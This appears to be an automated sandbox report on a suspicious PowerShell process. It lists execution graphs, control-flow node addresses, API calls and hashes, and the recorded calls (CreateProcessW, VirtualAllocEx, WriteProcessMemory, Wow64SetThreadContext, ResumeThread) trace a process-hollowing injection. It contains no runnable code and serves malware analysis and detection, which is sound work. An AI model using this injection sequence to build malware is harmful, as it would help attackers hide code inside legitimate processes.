                                                              execution_graph 7862 4c37d67 7863 4c37d51 7862->7863 7864 4c37e0d 7863->7864 7867 4c38640 7863->7867 7865 4c37e65 7868 4c3866a 7867->7868 7869 4c3865f 7867->7869 7868->7869 7870 4c38794 7868->7870 7893 4c38640 8 API calls 7868->7893 7895 4c387b0 7868->7895 7869->7865 7879 4c38eb4 7870->7879 7919 4c372f0 7870->7919 7872 4c39095 CreateProcessW 7875 4c39109 7872->7875 7873 4c388b8 7874 4c372fc Wow64SetThreadContext 7873->7874 7873->7879 7876 4c38923 7874->7876 7877 4c38a36 VirtualAllocEx 7876->7877 7876->7879 7883 4c38da8 7876->7883 7878 4c38a83 7877->7878 7878->7879 7880 4c38ad1 VirtualAllocEx 7878->7880 7882 4c38b25 7878->7882 7879->7872 7879->7883 7880->7882 7881 4c37314 WriteProcessMemory 7884 4c38b6f 7881->7884 7882->7879 7882->7881 7882->7883 7883->7865 7884->7879 7884->7883 7885 4c38cb9 7884->7885 7892 4c37314 WriteProcessMemory 7884->7892 7885->7879 7886 4c37314 WriteProcessMemory 7885->7886 7887 4c38ce2 7886->7887 7887->7879 7887->7883 7888 4c37320 Wow64SetThreadContext 7887->7888 7889 4c38d57 7888->7889 7889->7879 7890 4c38d5f 7889->7890 7890->7883 7891 4c38d68 ResumeThread 7890->7891 7891->7883 7892->7884 7893->7868 7897 4c387e4 7895->7897 7896 4c372f0 CreateProcessW 7899 4c388b8 7896->7899 7897->7896 7902 4c38eb4 7897->7902 7898 4c39095 CreateProcessW 7901 4c39109 7898->7901 7899->7902 7923 4c372fc 7899->7923 7902->7898 7916 4c38da8 7902->7916 7903 4c38923 7903->7902 7904 4c38a36 VirtualAllocEx 7903->7904 7903->7916 7905 4c38a83 7904->7905 7905->7902 7906 4c38ad1 VirtualAllocEx 7905->7906 7908 4c38b25 7905->7908 7906->7908 7908->7902 7908->7916 7927 4c37314 7908->7927 7909 4c38b6f 7909->7902 7910 4c38cb9 7909->7910 7909->7916 7918 4c37314 WriteProcessMemory 7909->7918 7910->7902 7911 4c37314 WriteProcessMemory 7910->7911 7912 4c38ce2 7911->7912 7912->7902 7912->7916 7931 4c37320 7912->7931 7915 4c38d5f 7915->7916 7917 4c38d68 ResumeThread 7915->7917 7916->7868 7917->7916 7918->7909 7920 4c38fb0 CreateProcessW 7919->7920 7922 4c39109 7920->7922 7924 4c391f0 Wow64SetThreadContext 7923->7924 7926 4c3926a 7924->7926 7926->7903 7928 4c39368 WriteProcessMemory 7927->7928 7930 4c393f3 7928->7930 7930->7909 7932 4c391f0 Wow64SetThreadContext 7931->7932 7934 4c38d57 7932->7934 7934->7902 7934->7915 7935 4c37e76 7936 4c37e42 7935->7936 7937 4c37e92 7935->7937 7936->7937 7939 4c38640 12 API calls 7936->7939 7938 4c37e65 7939->7938

                                                              Executed Functions

                                                              Function 04C387B0 Relevance: 6.7, APIs: 4, Instructions: 663memoryprocessthreadCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 358 4c387b0-4c38861 363 4c38867-4c38877 358->363 364 4c38f99-4c39029 358->364 367 4c38880 363->367 368 4c38879-4c3887e 363->368 371 4c39031-4c39038 364->371 372 4c3902b-4c3902e 364->372 370 4c38882-4c38884 367->370 368->370 373 4c38886-4c38899 370->373 374 4c3889b-4c388ba call 4c372f0 370->374 375 4c39043-4c39059 371->375 376 4c3903a-4c39040 371->376 372->371 373->374 383 4c388c3 374->383 384 4c388bc-4c388c1 374->384 377 4c39064-4c39107 CreateProcessW 375->377 378 4c3905b-4c39061 375->378 376->375 386 4c39110-4c39188 377->386 387 4c39109-4c3910f 377->387 378->377 385 4c388c5-4c388c7 383->385 384->385 388 4c38f0f-4c38f22 385->388 389 4c388cd-4c388e2 385->389 407 4c3919a-4c391a1 386->407 408 4c3918a-4c39190 386->408 387->386 400 4c38f29-4c38f3f 388->400 394 4c38f0a 389->394 395 4c388e8-4c3890c 389->395 394->388 395->400 404 4c38912-4c38925 call 4c372fc 395->404 400->364 413 4c38f41-4c38f4b 400->413 414 4c3892b-4c38932 404->414 415 4c38ead-4c38eaf 404->415 411 4c391a3-4c391b2 407->411 412 4c391b8 407->412 408->407 411->412 417 4c391b9 412->417 422 4c38f56-4c38f58 413->422 423 4c38f4d-4c38f54 413->423 418 4c38e93-4c38ea6 414->418 419 4c38938-4c38942 414->419 417->417 418->415 419->400 421 4c38948-4c38965 419->421 421->394 425 4c3896b-4c38985 call 4c37308 421->425 426 4c38f5a-4c38f5e 422->426 423->426 432 4c38eb4 425->432 433 4c3898b-4c38992 425->433 429 4c38f60 call 4c37f74 426->429 430 4c38f65-4c38f72 426->430 429->430 444 4c38f74 430->444 445 4c38f79-4c38f96 430->445 440 4c38ebb 432->440 435 4c38e79-4c38e8c 433->435 436 4c38998-4c389a1 433->436 435->418 438 4c389a3-4c389e7 436->438 439 4c38a0c-4c38a12 436->439 448 4c389f0-4c389fc 438->448 449 4c389e9-4c389ef 438->449 439->394 443 4c38a18-4c38a28 439->443 447 4c38ec5 440->447 443->394 454 4c38a2e-4c38a81 VirtualAllocEx 443->454 444->445 452 4c38ecc 447->452 448->440 453 4c38a02-4c38a06 448->453 449->448 458 4c38ed3 452->458 453->439 456 4c38e5f-4c38e72 453->456 460 4c38a83-4c38a89 454->460 461 4c38a8a-4c38aa8 454->461 456->435 463 4c38eda 458->463 460->461 461->447 462 4c38aae-4c38ab5 461->462 466 4c38abb-4c38ac2 462->466 467 4c38b3c-4c38b43 462->467 469 4c38ee1 463->469 466->452 468 4c38ac8-4c38acf 466->468 467->458 470 4c38b49-4c38b50 467->470 468->467 473 4c38ad1-4c38b23 VirtualAllocEx 468->473 474 4c38eeb 469->474 471 4c38b56-4c38b71 call 4c37314 470->471 472 4c38e45-4c38e58 470->472 471->463 481 4c38b77-4c38b7e 471->481 472->456 476 4c38b25-4c38b2b 473->476 477 4c38b2c-4c38b36 473->477 480 4c38ef2 474->480 476->477 477->467 486 4c38ef9 480->486 483 4c38b84-4c38b8d 481->483 484 4c38e2b-4c38e3e 481->484 483->394 487 4c38b93-4c38b99 483->487 484->472 490 4c38f03 486->490 487->394 489 4c38b9f-4c38baa 487->489 489->394 493 4c38bb0-4c38bb6 489->493 490->394 494 4c38cb9-4c38cca 493->494 495 4c38bbc-4c38bc1 493->495 494->394 498 4c38cd0-4c38ce4 call 4c37314 494->498 495->394 496 4c38bc7-4c38bda 495->496 496->394 501 4c38be0-4c38bf3 496->501 498->480 504 4c38cea-4c38cf1 498->504 501->394 505 4c38bf9-4c38c0e 501->505 506 4c38df7-4c38e0a 504->506 507 4c38cf7-4c38cfd 504->507 505->469 511 4c38c14-4c38c18 505->511 524 4c38e11-4c38e24 506->524 507->394 508 4c38d03-4c38d14 507->508 508->486 516 4c38d1a-4c38d1e 508->516 513 4c38c9f-4c38ca2 511->513 514 4c38c1e-4c38c27 511->514 513->394 517 4c38ca8-4c38cab 513->517 514->394 518 4c38c2d-4c38c30 514->518 519 4c38d20-4c38d23 516->519 520 4c38d29-4c38d31 516->520 517->394 522 4c38cb1-4c38cb3 517->522 518->394 523 4c38c36-4c38c66 518->523 519->520 520->394 521 4c38d37-4c38d41 520->521 521->400 525 4c38d47-4c38d59 call 4c37320 521->525 522->494 522->495 523->394 535 4c38c6c-4c38c85 call 4c37314 523->535 524->484 525->490 531 4c38d5f-4c38d66 525->531 533 4c38dc3-4c38dd6 531->533 534 4c38d68-4c38da6 ResumeThread 531->534 540 4c38ddd-4c38df0 533->540 536 4c38da8-4c38dae 534->536 537 4c38daf-4c38dbc 534->537 542 4c38c8a-4c38c8c 535->542 536->537 539 4c38dbe 537->539 537->540 539->444 540->506 542->474 544 4c38c92-4c38c99 542->544 544->513 544->524
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,00000000,00003000,00000040), ref: 04C38A6A
                                                              • VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040), ref: 04C38B0C
                                                                • Part of subcall function 04C37314: WriteProcessMemory.KERNELBASE(?,00000000,00000000,18F42514,00000000,?,?,?,00000000,00000000,?,04C38B6F,?,00000000,?), ref: 04C393E4
                                                              • ResumeThread.KERNELBASE(?), ref: 04C38D8F
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04C390F4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: AllocProcessVirtual$CreateMemoryResumeThreadWrite
                                                              • String ID:
                                                              • API String ID: 4270437565-0
                                                              • Opcode ID: e2bbc3d7e8cc5c0d3df90b63cdc4e1c3e22abd47de60f29ba526267e5d892815
                                                              • Instruction ID: 5879115cccba8aca63f0258be120db2c5474daf188dc4e4c8c45ac590bdc2868
                                                              • Opcode Fuzzy Hash: e2bbc3d7e8cc5c0d3df90b63cdc4e1c3e22abd47de60f29ba526267e5d892815
                                                              • Instruction Fuzzy Hash: 28429274E002198FDB24EF65C854B9EB7F3AF88301F1481A9E409A7291DB74AE85CF61
                                                              Function 04C38640 Relevance: 5.0, APIs: 3, Instructions: 520COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4064e2bec924627200ef7bd3e8dc476323e13a8f3b5c8e85063c7942934ece85
                                                              • Instruction ID: 2e6a0abc692e098bde34fdc39363dc21cc71a08d4bc9f33a1bac27a511efac86
                                                              • Opcode Fuzzy Hash: 4064e2bec924627200ef7bd3e8dc476323e13a8f3b5c8e85063c7942934ece85
                                                              • Instruction Fuzzy Hash: F612C374A002198FEB24EB25CC44BA9B7F7AF85345F1481A9F508DB291DB30AE84CF61
                                                              Function 07B609C8 Relevance: 14.1, Strings: 11, Instructions: 363COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 7b609c8-7b609eb 1 7b60bc6-7b60bcc 0->1 2 7b609f1-7b609f6 0->2 10 7b60bce-7b60c0e 1->10 11 7b60b68 1->11 3 7b60a0e-7b60a12 2->3 4 7b609f8-7b609fe 2->4 8 7b60b73-7b60b7d 3->8 9 7b60a18-7b60a1c 3->9 6 7b60a02-7b60a0c 4->6 7 7b60a00 4->7 6->3 7->3 12 7b60b7f-7b60b88 8->12 13 7b60b8b-7b60b91 8->13 14 7b60a1e-7b60a2d 9->14 15 7b60a2f 9->15 17 7b60c14-7b60c19 10->17 18 7b60d7b-7b60dad 10->18 19 7b60b69-7b60b70 11->19 20 7b60b97-7b60ba3 13->20 21 7b60b93-7b60b95 13->21 16 7b60a31-7b60a33 14->16 15->16 16->8 25 7b60a39-7b60a59 16->25 23 7b60c31-7b60c35 17->23 24 7b60c1b-7b60c21 17->24 41 7b60daf-7b60dbb 18->41 42 7b60dbd 18->42 26 7b60ba5-7b60bc3 20->26 21->26 31 7b60d2a-7b60d34 23->31 32 7b60c3b-7b60c3d 23->32 28 7b60c25-7b60c2f 24->28 29 7b60c23 24->29 56 7b60a5b-7b60a76 25->56 57 7b60a78 25->57 28->23 29->23 34 7b60d36-7b60d3f 31->34 35 7b60d42-7b60d48 31->35 37 7b60c3f-7b60c4b 32->37 38 7b60c4d 32->38 43 7b60d4e-7b60d5a 35->43 44 7b60d4a-7b60d4c 35->44 40 7b60c4f-7b60c51 37->40 38->40 40->31 46 7b60c57-7b60c59 40->46 48 7b60dbf-7b60dc1 41->48 42->48 49 7b60d5c-7b60d78 43->49 44->49 51 7b60c5b-7b60c67 46->51 52 7b60c69 46->52 53 7b60dc3-7b60dc9 48->53 54 7b60e0d-7b60e17 48->54 59 7b60c6b-7b60c6d 51->59 52->59 62 7b60dd7-7b60df4 53->62 63 7b60dcb-7b60dcd 53->63 60 7b60e22-7b60e28 54->60 61 7b60e19-7b60e1f 54->61 64 7b60a7a-7b60a7c 56->64 57->64 59->31 66 7b60c73-7b60c75 59->66 67 7b60e2e-7b60e3a 60->67 68 7b60e2a-7b60e2c 60->68 77 7b60df6-7b60e07 62->77 78 7b60e5a-7b60e5f 62->78 63->62 64->8 69 7b60a82-7b60a84 64->69 71 7b60c77-7b60c7d 66->71 72 7b60c8f-7b60c93 66->72 73 7b60e3c-7b60e57 67->73 68->73 74 7b60a86-7b60a92 69->74 75 7b60a94 69->75 81 7b60c81-7b60c8d 71->81 82 7b60c7f 71->82 84 7b60c95-7b60c9b 72->84 85 7b60cad-7b60d27 72->85 79 7b60a96-7b60a98 74->79 75->79 77->54 78->77 79->8 86 7b60a9e-7b60abe 79->86 81->72 82->72 88 7b60c9f-7b60cab 84->88 89 7b60c9d 84->89 99 7b60ad6-7b60ada 86->99 100 7b60ac0-7b60ac6 86->100 88->85 89->85 101 7b60af4-7b60af8 99->101 102 7b60adc-7b60ae2 99->102 103 7b60aca-7b60acc 100->103 104 7b60ac8 100->104 107 7b60aff-7b60b01 101->107 105 7b60ae6-7b60af2 102->105 106 7b60ae4 102->106 103->99 104->99 105->101 106->101 108 7b60b03-7b60b09 107->108 109 7b60b19 107->109 111 7b60b0d-7b60b0f 108->111 112 7b60b0b 108->112 109->19 111->109 112->109
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-3818565439
                                                              • Opcode ID: 456e3a24b5703c913458481181b2f991dec50d3e92228cca6ee521797aec14a9
                                                              • Instruction ID: e75486b324792317ea966aa1a576dc728ea50a4f9741feb66540766242b48c99
                                                              • Opcode Fuzzy Hash: 456e3a24b5703c913458481181b2f991dec50d3e92228cca6ee521797aec14a9
                                                              • Instruction Fuzzy Hash: 33C160F17143069FEB24AA7A8804B7BBBA5EF85311F24C4BADA05CB281DF35D941C761
                                                              Function 07B613A0 Relevance: 12.8, Strings: 10, Instructions: 345COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 113 7b613a0-7b613c6 114 7b61572-7b61578 113->114 115 7b613cc-7b613d1 113->115 123 7b61514-7b6151b 114->123 124 7b6157a-7b61584 114->124 116 7b613d3-7b613d9 115->116 117 7b613e9-7b613ed 115->117 118 7b613dd-7b613e7 116->118 119 7b613db 116->119 121 7b613f3-7b613f5 117->121 122 7b6151e-7b61528 117->122 118->117 119->117 125 7b613f7-7b61403 121->125 126 7b61405 121->126 127 7b61536-7b6153c 122->127 128 7b6152a-7b61533 122->128 136 7b61586-7b61599 124->136 137 7b6159b-7b615ba 124->137 133 7b61407-7b61409 125->133 126->133 129 7b61542-7b6154e 127->129 130 7b6153e-7b61540 127->130 135 7b61550-7b6156f 129->135 130->135 133->122 134 7b6140f-7b61413 133->134 140 7b61426 134->140 141 7b61415-7b61424 134->141 136->137 138 7b615c0-7b615c5 137->138 139 7b616ec-7b616f4 137->139 143 7b615c7-7b615cd 138->143 144 7b615dd-7b615e1 138->144 158 7b616f6-7b6171d 139->158 159 7b61690 139->159 145 7b61428-7b6142a 140->145 141->145 147 7b615d1-7b615db 143->147 148 7b615cf 143->148 150 7b615e7-7b615e9 144->150 151 7b6169e-7b616a8 144->151 145->122 149 7b61430-7b61432 145->149 147->144 148->144 153 7b61434-7b61440 149->153 154 7b61442 149->154 155 7b615eb-7b615f7 150->155 156 7b615f9 150->156 160 7b616b5-7b616bb 151->160 161 7b616aa-7b616b2 151->161 163 7b61444-7b61446 153->163 154->163 164 7b615fb-7b615fd 155->164 156->164 165 7b6171f-7b6172b 158->165 166 7b6172d 158->166 169 7b61695-7b6169b 159->169 167 7b616c1-7b616cd 160->167 168 7b616bd-7b616bf 160->168 163->122 170 7b6144c-7b6144e 163->170 164->151 171 7b61603-7b61605 164->171 172 7b6172f-7b61731 165->172 166->172 173 7b616cf-7b616e9 167->173 168->173 175 7b61450-7b61456 170->175 176 7b61468-7b61473 170->176 177 7b61607-7b6160d 171->177 178 7b6161f-7b61621 171->178 179 7b61733-7b61752 172->179 180 7b6179f-7b617a9 172->180 182 7b6145a-7b61466 175->182 183 7b61458 175->183 188 7b61475-7b61478 176->188 189 7b61482-7b6148e 176->189 186 7b61611-7b6161d 177->186 187 7b6160f 177->187 192 7b61628-7b6162a 178->192 207 7b61754-7b61760 179->207 208 7b61762 179->208 184 7b617b2-7b617b8 180->184 185 7b617ab-7b617af 180->185 182->176 183->176 193 7b617be-7b617ca 184->193 194 7b617ba-7b617bc 184->194 186->178 187->178 188->189 190 7b61490-7b61492 189->190 191 7b6149c-7b614ac 189->191 190->191 210 7b614c4 191->210 211 7b614ae-7b614b4 191->211 197 7b61642 192->197 198 7b6162c-7b61632 192->198 201 7b617cc-7b617ea 193->201 194->201 197->159 197->169 204 7b61636-7b61638 198->204 205 7b61634 198->205 204->197 205->197 212 7b61764-7b61766 207->212 208->212 210->123 213 7b614b6 211->213 214 7b614b8-7b614ba 211->214 212->180 215 7b61768-7b61785 212->215 213->210 214->210 218 7b61787-7b61799 215->218 219 7b617ed-7b617f2 215->219 218->180 219->218
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$4'dq$4'dq$4'dq$$dq$$dq$$dq$$dq$$dq$$dq
                                                              • API String ID: 0-4287419856
                                                              • Opcode ID: 723b32f006b8eca7ebcc97fabc3bc9bc50f6c799ac637df5ea95ed090f6e2d61
                                                              • Instruction ID: 2643f972c4a80714b523759a509a70ae2d788c9812047e263e0f48d7d5c6a096
                                                              • Opcode Fuzzy Hash: 723b32f006b8eca7ebcc97fabc3bc9bc50f6c799ac637df5ea95ed090f6e2d61
                                                              • Instruction Fuzzy Hash: BDB13DF570430E9FEB158E6D840477BBBB6EF81211F2884EADA05CB291DB39C941CB61
                                                              Function 07B61F18 Relevance: 8.0, Strings: 6, Instructions: 453COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 221 7b61f18-7b61f3a 222 7b620b7-7b620d5 221->222 223 7b61f40-7b61f45 221->223 229 7b620d7-7b62102 222->229 230 7b62058-7b6205f 222->230 224 7b61f47-7b61f4d 223->224 225 7b61f5d-7b61f69 223->225 226 7b61f51-7b61f5b 224->226 227 7b61f4f 224->227 235 7b62062-7b6206c 225->235 236 7b61f6f-7b61f72 225->236 226->225 227->225 233 7b6225d-7b622a2 229->233 234 7b62108-7b6210d 229->234 250 7b6244c-7b62454 233->250 251 7b622a8-7b622ad 233->251 237 7b62125-7b62129 234->237 238 7b6210f-7b62115 234->238 239 7b6206e-7b62077 235->239 240 7b6207a-7b62080 235->240 236->235 241 7b61f78-7b61f7f 236->241 248 7b6212f-7b62133 237->248 249 7b62208-7b62212 237->249 243 7b62117 238->243 244 7b62119-7b62123 238->244 245 7b62086-7b62092 240->245 246 7b62082-7b62084 240->246 241->222 247 7b61f85-7b61f8a 241->247 243->237 244->237 254 7b62094-7b620b4 245->254 246->254 255 7b61fa2-7b61fa6 247->255 256 7b61f8c-7b61f92 247->256 257 7b62135-7b62146 248->257 258 7b62173 248->258 252 7b62214-7b6221d 249->252 253 7b62220-7b62226 249->253 289 7b62456-7b6247c 250->289 290 7b623f0-7b623f1 250->290 260 7b622c5-7b622c9 251->260 261 7b622af-7b622b5 251->261 262 7b6222c-7b62238 253->262 263 7b62228-7b6222a 253->263 255->235 259 7b61fac-7b61fb0 255->259 267 7b61f96-7b61fa0 256->267 268 7b61f94 256->268 257->233 280 7b6214c-7b62151 257->280 264 7b62175-7b62177 258->264 276 7b61fb2-7b61fce 259->276 277 7b61fd0 259->277 272 7b623f4-7b623fe 260->272 273 7b622cf-7b622d3 260->273 270 7b622b7 261->270 271 7b622b9-7b622c3 261->271 278 7b6223a-7b6225a 262->278 263->278 264->249 274 7b6217d-7b62181 264->274 267->255 268->255 270->260 271->260 284 7b62400-7b62409 272->284 285 7b6240c-7b62412 272->285 281 7b622d5-7b622e6 273->281 282 7b62313 273->282 274->249 283 7b62187-7b62196 274->283 287 7b61fd2-7b61fd4 276->287 277->287 291 7b62153-7b62159 280->291 292 7b62169-7b62171 280->292 281->250 314 7b622ec-7b622f1 281->314 297 7b62315-7b62317 282->297 315 7b621ae-7b62205 283->315 316 7b62198-7b6219e 283->316 294 7b62414-7b62416 285->294 295 7b62418-7b62424 285->295 287->235 299 7b61fda-7b61fe7 287->299 300 7b624b5-7b624bf 289->300 301 7b6247e-7b6249b 289->301 305 7b6215d-7b62167 291->305 306 7b6215b 291->306 292->264 309 7b62426-7b62449 294->309 295->309 297->272 310 7b6231d-7b62321 297->310 333 7b61fee-7b61ff0 299->333 303 7b624c1-7b624c5 300->303 304 7b624c8-7b624ce 300->304 331 7b62505-7b6250a 301->331 332 7b6249d-7b624af 301->332 312 7b624d4-7b624e0 304->312 313 7b624d0-7b624d2 304->313 305->292 306->292 310->272 318 7b62327-7b6232b 310->318 322 7b624e2-7b62502 312->322 313->322 324 7b622f3-7b622f9 314->324 325 7b62309-7b62311 314->325 326 7b621a2-7b621a4 316->326 327 7b621a0 316->327 318->272 330 7b62331-7b62357 318->330 335 7b622fd-7b62307 324->335 336 7b622fb 324->336 325->297 326->315 327->315 330->272 348 7b6235d-7b62361 330->348 331->332 332->300 337 7b61ff2-7b61ff8 333->337 338 7b62008 333->338 335->325 336->325 343 7b61ffc-7b61ffe 337->343 344 7b61ffa 337->344 338->230 343->338 344->338 349 7b62384 348->349 350 7b62363-7b6236c 348->350 353 7b62387-7b62394 349->353 351 7b62373-7b62380 350->351 352 7b6236e-7b62371 350->352 354 7b62382 351->354 352->354 356 7b6239a-7b623ef 353->356 354->353 356->290
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (odq$(odq$4'dq$4'dq$4'dq$4'dq
                                                              • API String ID: 0-3783337584
                                                              • Opcode ID: fad5c3b01905c857ec0d94a182c1a89c17ef78b8391666b6b6195832b3db9894
                                                              • Instruction ID: 850f02c975744898e9a0244a2a46ff3d9f91db96cf7c13b1f5fd15977239a46b
                                                              • Opcode Fuzzy Hash: fad5c3b01905c857ec0d94a182c1a89c17ef78b8391666b6b6195832b3db9894
                                                              • Instruction Fuzzy Hash: 09F1E5F1B0430ADFFB149F69C8087AABBA2FF85311F14C4AAD6198B291DB35C945C791
                                                              Function 07B609A9 Relevance: 3.9, Strings: 3, Instructions: 108COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 783 7b609a9-7b609eb 786 7b60bc6-7b60bcc 783->786 787 7b609f1-7b609f6 783->787 795 7b60bce-7b60c0e 786->795 796 7b60b68 786->796 788 7b60a0e-7b60a12 787->788 789 7b609f8-7b609fe 787->789 793 7b60b73-7b60b7d 788->793 794 7b60a18-7b60a1c 788->794 791 7b60a02-7b60a0c 789->791 792 7b60a00 789->792 791->788 792->788 797 7b60b7f-7b60b88 793->797 798 7b60b8b-7b60b91 793->798 799 7b60a1e-7b60a2d 794->799 800 7b60a2f 794->800 802 7b60c14-7b60c19 795->802 803 7b60d7b-7b60dad 795->803 804 7b60b69-7b60b70 796->804 805 7b60b97-7b60ba3 798->805 806 7b60b93-7b60b95 798->806 801 7b60a31-7b60a33 799->801 800->801 801->793 810 7b60a39-7b60a59 801->810 808 7b60c31-7b60c35 802->808 809 7b60c1b-7b60c21 802->809 826 7b60daf-7b60dbb 803->826 827 7b60dbd 803->827 811 7b60ba5-7b60bc3 805->811 806->811 816 7b60d2a-7b60d34 808->816 817 7b60c3b-7b60c3d 808->817 813 7b60c25-7b60c2f 809->813 814 7b60c23 809->814 841 7b60a5b-7b60a76 810->841 842 7b60a78 810->842 813->808 814->808 819 7b60d36-7b60d3f 816->819 820 7b60d42-7b60d48 816->820 822 7b60c3f-7b60c4b 817->822 823 7b60c4d 817->823 828 7b60d4e-7b60d5a 820->828 829 7b60d4a-7b60d4c 820->829 825 7b60c4f-7b60c51 822->825 823->825 825->816 831 7b60c57-7b60c59 825->831 833 7b60dbf-7b60dc1 826->833 827->833 834 7b60d5c-7b60d78 828->834 829->834 836 7b60c5b-7b60c67 831->836 837 7b60c69 831->837 838 7b60dc3-7b60dc9 833->838 839 7b60e0d-7b60e17 833->839 844 7b60c6b-7b60c6d 836->844 837->844 847 7b60dd7-7b60df4 838->847 848 7b60dcb-7b60dcd 838->848 845 7b60e22-7b60e28 839->845 846 7b60e19-7b60e1f 839->846 849 7b60a7a-7b60a7c 841->849 842->849 844->816 851 7b60c73-7b60c75 844->851 852 7b60e2e-7b60e3a 845->852 853 7b60e2a-7b60e2c 845->853 862 7b60df6-7b60e07 847->862 863 7b60e5a-7b60e5f 847->863 848->847 849->793 854 7b60a82-7b60a84 849->854 856 7b60c77-7b60c7d 851->856 857 7b60c8f-7b60c93 851->857 858 7b60e3c-7b60e57 852->858 853->858 859 7b60a86-7b60a92 854->859 860 7b60a94 854->860 866 7b60c81-7b60c8d 856->866 867 7b60c7f 856->867 869 7b60c95-7b60c9b 857->869 870 7b60cad-7b60d27 857->870 864 7b60a96-7b60a98 859->864 860->864 862->839 863->862 864->793 871 7b60a9e-7b60abe 864->871 866->857 867->857 873 7b60c9f-7b60cab 869->873 874 7b60c9d 869->874 884 7b60ad6-7b60ada 871->884 885 7b60ac0-7b60ac6 871->885 873->870 874->870 886 7b60af4-7b60af8 884->886 887 7b60adc-7b60ae2 884->887 888 7b60aca-7b60acc 885->888 889 7b60ac8 885->889 892 7b60aff-7b60b01 886->892 890 7b60ae6-7b60af2 887->890 891 7b60ae4 887->891 888->884 889->884 890->886 891->886 893 7b60b03-7b60b09 892->893 894 7b60b19 892->894 896 7b60b0d-7b60b0f 893->896 897 7b60b0b 893->897 894->804 896->894 897->894
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2069658988.0000000007B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B60000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_7b60000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'dq$$dq$$dq
                                                              • API String ID: 0-328139867
                                                              • Opcode ID: 5bdf64f9a078b801365f319bad094f596232c2e4b00b721165e7542a310e41e6
                                                              • Instruction ID: 200d1e74702839f43dd50d992f7b791c4cd112ae66bdc3991a9737bbad8817bd
                                                              • Opcode Fuzzy Hash: 5bdf64f9a078b801365f319bad094f596232c2e4b00b721165e7542a310e41e6
                                                              • Instruction Fuzzy Hash: 7E312AF0604306DFEB20AE26C514F7A77A1EF51288F5980EAD6018B291EB39C940C771
                                                              Function 04C372F0 Relevance: 1.7, APIs: 1, Instructions: 156processCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 898 4c372f0-4c39029 900 4c39031-4c39038 898->900 901 4c3902b-4c3902e 898->901 902 4c39043-4c39059 900->902 903 4c3903a-4c39040 900->903 901->900 904 4c39064-4c39107 CreateProcessW 902->904 905 4c3905b-4c39061 902->905 903->902 907 4c39110-4c39188 904->907 908 4c39109-4c3910f 904->908 905->904 915 4c3919a-4c391a1 907->915 916 4c3918a-4c39190 907->916 908->907 917 4c391a3-4c391b2 915->917 918 4c391b8 915->918 916->915 917->918 920 4c391b9 918->920 920->920
                                                              APIs
                                                              • CreateProcessW.KERNELBASE(00000000,?,00000009,?,?,?,?,?,?,?), ref: 04C390F4
                                                              Memory Dump Source
                                                              • Source File: 00000007.00000002.2033732709.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_7_2_4c30000_powershell.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID:
                                                              • API String ID: 963392458-0
                                                              • Opcode ID: 53ec51e56cbf2a96c7a3c3f090272fccd04fcefe735bc6aab8b23aca3430e6c6
                                                              • Instruction ID: 30d7b73a5d9f142b1a9a2c2853af84fe81b25875e38e1c8f43e5b17590d4563e
                                                              • Opcode Fuzzy Hash: 53ec51e56cbf2a96c7a3c3f090272fccd04fcefe735bc6aab8b23aca3430e6c6
                                                              • Instruction Fuzzy Hash: 1A5129B1D0125ADFDB24CF99C944BDDBBB5BF48314F0085AAE909B7250D771AA84CF90
                                                              Function 04C39360 Relevance: 1.6, APIs: 1, Instructions: 64injectionCOMMON
                                                              Download Yara Rule

